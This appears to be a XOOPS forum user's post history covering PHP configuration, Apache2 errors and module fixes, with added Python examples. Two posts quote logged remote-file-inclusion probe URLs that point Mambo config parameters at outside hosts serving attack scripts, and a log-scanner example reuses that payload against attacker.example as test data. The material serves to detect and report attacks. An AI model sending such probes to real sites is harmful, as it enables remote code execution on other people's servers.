91
peterr
Re: protector without htaccess (how secure is XOOPS???)
  • 2008/4/24 0:53

  • peterr

  • Just can't stay away

  • Posts: 518

  • Since: 2004/8/5 9


Quote:

I think you need to have a copy of the php.ini file in every directory that contains a PHP script that can be run by HTTP request, and those individual php.ini files only need contain the settings that are specific to that directory.

I might be wrong about this; I don't have a server with that configuration to test.


Dave, I have had to check this out in the past, and ..

1. Yes, you do need to have a copy of the php.ini file in every directory that contains a PHP script that can be run by HTTP request. That php.ini file needs to be a full and complete copy of the php.ini that is used for php config now, plus the modifications needed.

2. I found that just having a php.ini file containing only the settings that are specific for a particular directory did not work, as it only overrides those few settings, and leaves all other php settings as the default values.
NO to the Microsoft Office format as an ISO standard.
Sign the petition
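A check for the point made in this post, added here as an example (not code from the post or from XOOPS): it reads the server-wide php.ini and a per-directory copy, and reports every directive the copy leaves out, since those silently fall back to PHP's built-in defaults rather than to the server-wide values. The two ini texts are constructed samples; the parser is a minimal one that understands `key = value` lines, `[sections]` and `;` comments outside double quotes.

```python
"""Verify that a per-directory php.ini is a complete copy of the master file.

Added example, not from the forum post. Directives present in the master
but absent from the per-directory copy are the problem the post describes:
PHP does not merge the two files, so a missing directive takes the compiled
default, not the server-wide value.
"""


def _strip_comment(line):
    """Drop a ';' comment, but only when the ';' is outside double quotes."""
    in_quotes = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == ";" and not in_quotes:
            return line[:i]
    return line


def parse_php_ini(text):
    """Minimal php.ini reader: returns {directive: value} for 'key = value' lines."""
    settings = {}
    for raw in text.splitlines():
        line = _strip_comment(raw).strip()
        if not line or line.startswith("[") or "=" not in line:
            continue  # blank, section header, or not a directive
        key, value = line.split("=", 1)
        settings[key.strip()] = value.strip().strip('"')
    return settings


def compare_ini(master_text, directory_text):
    """Report what the per-directory file is missing, changes, or adds."""
    master = parse_php_ini(master_text)
    local = parse_php_ini(directory_text)
    return {
        # directives that will fall back to PHP defaults in that directory
        "missing": sorted(k for k in master if k not in local),
        # deliberate overrides: (master value, directory value)
        "changed": {k: (master[k], local[k]) for k in local
                    if k in master and master[k] != local[k]},
        "extra": sorted(k for k in local if k not in master),
    }


def is_complete_copy(report):
    """True when nothing from the master file has been dropped."""
    return not report["missing"]


# Constructed excerpt standing in for the server-wide php.ini.
MASTER_INI = """
[PHP]
register_globals = On
allow_url_fopen = On
session.use_trans_sid = 1
display_errors = Off
include_path = ".:/usr/share/php"  ; path string contains no comment
"""

# Constructed per-directory file holding only the overrides (what the post
# reports as not working).
PARTIAL_INI = """
register_globals = Off
allow_url_fopen = Off
session.use_trans_sid = 0
"""

# Constructed full copy with the same overrides applied.
FULL_INI = """
[PHP]
register_globals = Off
allow_url_fopen = Off
session.use_trans_sid = 0
display_errors = Off
include_path = ".:/usr/share/php"
"""

if __name__ == "__main__":
    for name, text in (("partial", PARTIAL_INI), ("full", FULL_INI)):
        report = compare_ini(MASTER_INI, text)
        print(name, "complete" if is_complete_copy(report) else "incomplete", report)
```

Run it against the real files (for example `/etc/php.ini` and the copy in the web directory) by reading them into strings; any entry under `missing` is a setting that directory no longer inherits.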



92
peterr
Re: Increase in attempted exploits
  • 2008/4/24 0:36



There is one pattern of a lot of exploits, and it is this as part of the uri

Quote:

.....mosConfig_absolute_path=.....


Apparently, that is related to Mambo exploits, so I did a google search on the site, and looked for 'mambo', and sure enough, there is one page that has Mambo described in it.

So, no doubt the huge increase in exploits is because the attempted exploiters think the website is running Mambo.

I'll remove that page, and then see if there is a decrease; it may take several weeks before the Google cache is updated of course.



93
peterr
Apache2, php5 and internal server errors
  • 2008/4/22 5:15



Just starting to shift an XOOPS site, to an Apache2 and php5 configured server. I have always used the 'php_flag' settings in .htaccess, as modules like protector, and other XOOPS security settings, need the php settings changed.

On the new server, getting a 500 error on .htaccess

Quote:

Invalid command 'php_flag', perhaps mis-spelled or defined by a module not included in the server configuration


I noticed a few posts on various sites stating the following:

Quote:

adding php_flag in .htaccess under apache 2 will cause internal server error. according to apache 2 manual, php_flag should go to <virtual> or <directory> section.


I will have to find out if the new server is running phpsuexec or not, as this FAQ states that with phpsuexec, one cannot use .htaccess to modify php settings.

However, I think the reason for the problem is Apache2 somehow.

Has anyone else had this sort of problem, and if I currently have the following in .htaccess

# XOOPS security measures
php_flag session.use_trans_sid off
# Protector module
php_flag register_globals off
php_flag allow_url_fopen off


and phpsuexec is not running on the new server, do I use the <virtual> or <directory> section to modify the settings?



94
peterr
Re: Increase in attempted exploits
  • 2008/4/17 6:57



Quote:

Somebody is clearly trying to break in. I hope you have your XOOPS Protector module up and running. Many of these hits may be random, but they clearly try to deliver a payload, and you can actually see it if you call up the txt files the hacker wants to execute on your server. Those are scripts that sniff out vulnerabilities in the servers setup and try to get shell access.


Yes, I use Protector, I wouldn't use XOOPS without it. Yep, lots of the text files have 'passthru' and other commands in them, clearly malicious activity, which I'd expect, but it has risen so much, I'm wondering if there is a new XOOPS exploit that people know about, and they are giving the site a hammering.

Fortunately, the server is configured to return a 403 on most of these, or a 404.

Quite a lot of these entries have 'database.php' in them, that's why I was wondering if there is a new exploit, but as yet unknown to a lot of people. Found one at http://www.milw0rm.com/exploits/2623 , but it is dated Oct 2006, a long time ago.

Quote:

Where are these log entries from, anyway? They look funky.


Coming from many different IP addresses. Hmm, look funky, not too sure what you mean there ?? Oh, the domain name has been changed, for obvious security reasons, we don't want people actually trying it.

Quote:

If you have a lot of time to spare, you can contact the webhosts from which these scripts are served and tell them that some of their users are making nonsense. But then, that's a fight against windmills.


In the past, I sometimes used to actually look up the IP and contact the person/s concerned, and CC in their ISP, but that was when there were only a few a day. Much of that contact resulted in either the person having their account suspended or terminated, or other action. Most hosts appreciated being contacted. Also, as you mention, contact the 'source' from where the scripts are served, yes, did that in the past, in a lot of cases, it resulted in the file being removed. But some sort of automated system would be better.

Quote:

You can also send a sample to your own webhost and ask them for guidance, and to make sure that the servers are configured correctly.


The host I use has it all tied down fairly well, but the 403 messages have now changed to 404's, so I'll ask why the server change.

Quote:

*edit* But probably, you don't want to have to do with those tugzip folks. So forget the suggestion with contacting them. In any case, make sure you don't use the Internet Explorer if you want to look around what's going on there.


Yes, I don't use IE, Firefox for me.



95
peterr
Increase in attempted exploits
  • 2008/4/16 11:53



Just wondering if any other XOOPS users are noticing a significant increase in the number of exploits on their site ?

The type of activity that has increased is of this nature:

Quote:

www.example.com/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tugzip.com/files/xpl/test.txt???

www.example.com/modules/xhld0//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.nameserver11.net/billing2/include/html/test.txt?

www.example.com//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.nameserver11.net/billing2/include/html/test.txt?

www.example.com/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.nameserver11.net/billing2/include/html/test.txt?

www.example.com/modules/xhld0/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.nameserver11.net/billing2/include/html/test.txt?

www.example.com/modules/xhld0/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tugzip.com/files/xpl/test.txt???


I have checked the site at http://www.milw0rm.com/ , and searched for 'XOOPS', to see if there are any new vulnerabilities, but cannot see anything significant.

The number of attempted exploits has gone from about 3 or 4 a day to 90 or so, quite a rise.

Maybe it's just a case of more people with nothing better to do ??
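The requests quoted in this post and in the later "Re: Increase in attempted exploits" reply share one shape: a query parameter (`mosConfig_absolute_path`, `mosConfig_live_site`) whose value is itself a URL, which is what a remote-file-inclusion probe against Mambo/Joomla looks like. The following is an added example, not code from the posts or from XOOPS, that scans combined-format access log lines for that shape and tallies the probes per source address and per response status, so a rise like the one described (3 or 4 a day to about 90) shows up in the counts. The log lines are constructed samples modelled on the quoted URIs, with the hosting domain replaced by `attacker.example`.

```python
"""Flag remote-file-inclusion probes in web server access logs.

Added example (not from the forum posts). A probe is any request whose
query string carries one of the known Mambo config parameters, or any
parameter whose value is an absolute URL (the generic RFI pattern).
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameter names seen in the quoted requests; the URL-value test below
# also catches the same trick under any other parameter name.
RFI_PARAMS = {"mosConfig_absolute_path", "mosConfig_live_site"}
URL_VALUE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def classify_request(target):
    """Return [(param, value)] for every query parameter that looks like an RFI probe."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = unquote(value)  # second pass catches double-encoded values
        if name in RFI_PARAMS or URL_VALUE.match(value):
            hits.append((name, value))
    return hits


def scan_log(lines):
    """Parse each log line and keep the ones carrying a probe."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hits = classify_request(m["target"])
        if hits:
            findings.append({
                "ip": m["ip"],
                "status": int(m["status"]),
                "path": urlsplit(m["target"]).path,
                "hits": hits,
            })
    return findings


def summarize(findings):
    """Count probes per source IP and per HTTP status the server answered with."""
    per_ip, per_status = {}, {}
    for f in findings:
        per_ip[f["ip"]] = per_ip.get(f["ip"], 0) + 1
        per_status[f["status"]] = per_status.get(f["status"], 0) + 1
    return per_ip, per_status


# Constructed log lines modelled on the URIs quoted in the posts.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Apr/2008:11:40:01 +0000] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content'
    '&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://attacker.example/test.txt??? HTTP/1.1" '
    '403 212 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [16/Apr/2008:11:40:02 +0000] "GET /administrator/components/com_a6mambocredits/'
    'admin.a6mambocredits.php?mosConfig_live_site=http://attacker.example/test.txt? HTTP/1.1" '
    '404 198 "-" "Mozilla/4.0"',
    '198.51.100.23 - - [16/Apr/2008:11:41:10 +0000] "GET /modules/news/article.php?storyid=42 HTTP/1.1" '
    '200 5123 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [16/Apr/2008:11:42:00 +0000] "GET /modules/xhld0//index.php?_REQUEST=&'
    'mosConfig_absolute_path=http%3A%2F%2Fattacker.example%2Ftest.txt%3F HTTP/1.1" 404 198 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["status"], f["path"], f["hits"])
    print(summarize(found))
```

Feed it a real log with `scan_log(open("access_log"))`; the per-status tally is the quick way to confirm what the later reply mentions, namely whether the server is answering these with 403 or has switched to 404.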



96
peterr
Re: php5/mysql5
  • 2008/1/4 10:55






97
peterr
Upgrade from 2.0.16 ==> 2.0.17.1
  • 2007/11/2 11:52



Upgrade went without any problems, but I was mystified why XOOPS thought I was running 2.0.15

In the ../upgrade part, I had to upgrade from 2.0.15 to 2.0.16 and then upgrade to 2.0.17.1 ??

Also, when comparing vers 2.0.16 to 2.0.17.1, there were 2 files in 2.0.16 that are not in 2.0.17.1

Quote:

\class\smarty\plugins\function.assign.php
\class\smarty\plugins\function.xoops_link.php


I assume I can delete these 2 files ?

Peter



98
peterr
WF-Links - displaying comments
  • 2007/9/28 5:52



The comments in wf-links are displayed, regardless of the XOOPS config setting. Where a module has specified via the configuration, to "disable comments", then the "comment link" should not be displayed (Smartsection only displays the comments if they are enabled, I think ??) in the /modules/wflinks/singlelink.php

I haven't tested this modification, but it appears that it would only take 3 lines to add, as follows:

1. In /modules/wflinks/include/linkloadinfo.php, add this at the end

$link['comment_rules'] = $xoopsModuleConfig['com_rule'];


2. Line 79 of /modules/wflinks/templates/wflinks_singlelink.html currently displays the comments, as follows ..

<a href="<{$xoops_url}>/modules/<{$link.module_dir}>/singlelink.php?cid=<{$link.cid}>&lid=<{$link.id}>"><{$smarty.const._COMMENTS}> (<{$link.comments}>)</a>


3. Change this, so that the displaying of the comments are conditional ..

<{* show the comment link only when the module's com_rule is not 0 (comments disabled) *}>
<{if $link.comment_rules > 0}>
  <a href="<{$xoops_url}>/modules/<{$link.module_dir}>/singlelink.php?cid=<{$link.cid}>&lid=<{$link.id}>"><{$smarty.const._COMMENTS}> (<{$link.comments}>)</a>
<{/if}>


This _should_ work okay.



99
peterr
Re: Calling JMorris!! Bluehue theme "quirk"
  • 2007/9/10 11:31



Quote:

wrote:
P.S. I now have a dedicated support forum for my themes and modules at MyWebResource.


I get a 404 on that link ?



100
peterr
Re: Compatibility Forum Newbb with XOOPS 2.0.17 ??
  • 2007/9/6 13:05



Yes, that is how the structure is setup (some of those are on different domains, but that is irrelevant).

You are correct about Frameworks, it isn't in the place where you have indicated that it should be, it's like this ..

--africa/
----cache/
----class/
----images/
...
--chile/
----cache/
----class/
----images/
...
--Frameworks/